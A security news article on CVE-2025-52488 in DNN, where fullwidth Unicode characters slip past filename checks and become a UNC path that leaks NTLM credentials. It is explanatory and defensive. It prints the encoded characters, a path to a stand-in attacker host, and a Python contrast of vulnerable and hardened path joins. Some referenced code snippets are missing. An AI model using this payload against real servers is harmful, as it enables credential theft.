A critical vulnerability in DNN (formerly DotNetNuke) enables attackers to steal NTLM credentials through a sophisticated Unicode normalization bypass technique.
The vulnerability, tracked as CVE-2025-52488, affects one of the oldest open-source content management systems and demonstrates how defensive coding measures can be circumvented through clever exploitation of Windows and .NET quirks.
Key Takeaways
1. CVE-2025-52488 in DNN allows attackers to steal NTLM credentials without requiring user authentication.
2. Specific Unicode characters (U+FF0E, U+FF3C) normalize into dots and backslashes after passing security validation, bypassing the protection mechanisms.
3. Malicious filenames transform into UNC paths (\\attacker.com\share) that trigger SMB connections to attacker-controlled servers via File.Exists.
4. Enables NTLM credential theft affecting enterprises and demonstrates how defensive coding can be circumvented through character encoding.
NTLM Credential Leak
Searchlight Cyber reports that the vulnerability exploits a fundamental weakness in how .NET applications handle file system operations on Windows machines.
When attackers control file paths, they can supply UNC (Universal Naming Convention) paths that trigger out-of-band calls to attacker-controlled SMB servers.
This mechanism becomes particularly dangerous when combined with functions like File.Exists, System.Web.HttpRequest, and System.Web.WebClient, which can inadvertently leak NTLM credentials to malicious servers.
The attack leverages the behavior of the Path.Combine function in C#: if the second argument contains an absolute path, the first argument is completely ignored.
According to Microsoft documentation, “if an argument other than the first contains a rooted path, any previous path components are ignored, and the returned string begins with that rooted path component.”
This behavior, while documented, frequently leads to security vulnerabilities in C# codebases.
Technical analysis reveals that the core of this vulnerability lies in DNN’s Unicode handling process.
The application implements multiple security boundaries to prevent malicious file uploads, including Path.GetFileName calls, regex replacements, and validation functions like Utility.ValidateFileName and Utility.CleanFileName.
However, these security checks occur before the critical Utility.ConvertUnicodeChars function. The vulnerable code section shows:
The ConvertUnicodeChars function contains the critical vulnerability on this line:
This normalization process converts Unicode characters to ASCII equivalents, effectively bypassing all previously implemented security measures.
Researchers discovered specific Unicode characters that normalize into dangerous path components:
%EF%BC%8E (U+FF0E): “FULLWIDTH FULL STOP” normalizes to “.”
%EF%BC%BC (U+FF3C): “FULLWIDTH REVERSE SOLIDUS” normalizes to “\”
These characters allow attackers to construct malicious filenames that appear safe during initial validation but transform into UNC paths after normalization. The exploit payload demonstrates this:
When processed, this becomes \\attacker.com\share\file.jpg, triggering an SMB connection that leaks NTLM credentials to the attacker’s Responder server.
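The validate-then-normalize ordering described above, and the fix of normalizing before validating, as an added example that is not DNN’s code or the researchers’ code. It uses Python’s ntpath so the Windows Path.Combine rule (a rooted second argument discards the first) is reproduced on any platform; the function names, the upload root and the payload string are constructed for illustration.

```python
import ntpath
import re
import unicodedata
from typing import Optional

# Constructed sample upload root; Windows-style path handled via ntpath.
UPLOAD_ROOT = r"C:\inetpub\dnn\Portals\0"

# Characters a safe upload name must not contain: separators, drive colons,
# wildcards and a '..' sequence. Intent mirrors CleanFileName-style checks.
_FORBIDDEN = re.compile(r'[\\/:*?"<>|]|\.\.')


def looks_safe(name: str) -> bool:
    """Check the name exactly as received, with no normalization applied."""
    return not _FORBIDDEN.search(name) and not name.startswith(".")


def fold_unicode(name: str) -> str:
    """NFKC compatibility folding: U+FF0E -> '.', U+FF3C -> '\\'."""
    return unicodedata.normalize("NFKC", name)


def vulnerable_join(name: str) -> Optional[str]:
    """Validate, THEN fold, then combine: the order the advisory describes."""
    if not looks_safe(name):
        return None
    # ntpath.join, like Path.Combine, returns the second argument whenever
    # it is rooted (drive letter or \\server\share), discarding UPLOAD_ROOT.
    return ntpath.join(UPLOAD_ROOT, fold_unicode(name))


def hardened_join(name: str) -> Optional[str]:
    """Fold FIRST, validate the folded form, and refuse anything rooted."""
    folded = fold_unicode(name)
    if not looks_safe(folded) or ntpath.isabs(folded):
        return None
    full = ntpath.join(UPLOAD_ROOT, folded)
    # Defence in depth: the result must still live under the upload root.
    if not full.startswith(UPLOAD_ROOT + "\\"):
        return None
    return full


# Constructed payload: fullwidth reverse solidus and full stop in place of
# ASCII '\' and '.', so no forbidden character is present before folding.
PAYLOAD = "\uff3c\uff3cattacker\uff0ecom\uff3cshare\uff3cfile\uff0ejpg"

if __name__ == "__main__":
    print(vulnerable_join(PAYLOAD))     # \\attacker.com\share\file.jpg (UNC path)
    print(hardened_join(PAYLOAD))       # None
    print(hardened_join("report.jpg"))  # C:\inetpub\dnn\Portals\0\report.jpg
```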
Risk Factors and Details
Affected Products: DNN – all versions with the DNNConnect.CKE HTML Editor Provider
Impact: NTLM credential theft
Exploit Prerequisites:
- No authentication required (pre-authentication vulnerability)
- Target system running DNN with file upload functionality
- Windows environment with SMB enabled
- Attacker-controlled server to receive NTLM hashes
CVSS 3.1 Score: 8.6 (High)
This vulnerability highlights the complexity of Unicode handling in web applications and demonstrates how defensive programming measures can be undermined by character encoding transformations.
The pre-authentication nature of this vulnerability makes it particularly dangerous, as it requires no user credentials to exploit and can compromise domain credentials through NTLM relay attacks.